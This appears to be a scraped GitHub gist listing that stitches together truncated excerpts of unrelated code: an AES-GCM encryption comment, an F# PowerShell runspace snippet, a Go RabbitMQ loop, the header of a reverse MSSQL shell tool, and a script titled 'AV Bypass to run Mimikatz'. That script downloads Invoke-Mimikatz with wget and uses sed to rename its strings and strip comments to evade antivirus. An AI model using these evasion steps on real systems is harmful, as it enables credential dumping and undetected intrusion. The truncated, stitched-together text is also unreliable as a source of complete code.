This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MPL-2.0 | |
// AES Encryption/Decryption with AES-256-GCM using random Initialization Vector + Salt | |
// ---------------------------------------------------------------------------------------- | |
// the encrypted datablock is base64 encoded for easy data exchange. | |
// if you have the option to store data binary save consider to remove the encoding to reduce storage size | |
// ---------------------------------------------------------------------------------------- | |
// format of encrypted data - used by this example. not an official format | |
// | |
// +--------------------+-----------------------+----------------+----------------+ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# AV Bypass to run Mimikatz | |
# From: https://www.blackhillsinfosec.com/?p=5555 | |
# Server side: | |
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" | |
open System.Management.Automation | |
open System.Management.Automation.Runspaces | |
open System | |
let runSpace = RunspaceFactory.CreateRunspace() | |
runSpace.Open() | |
let pipeline = runSpace.CreatePipeline() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import requests | |
import threading | |
import HTMLParser | |
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
''' | |
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration | |
Author: @xassiz | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
go func() { | |
for { | |
err = rmq.Stream(cancelCtx) | |
if errors.Is(err, rabbitmq.ErrDisconnected) { | |
continue | |
} | |
break | |
} | |
}() |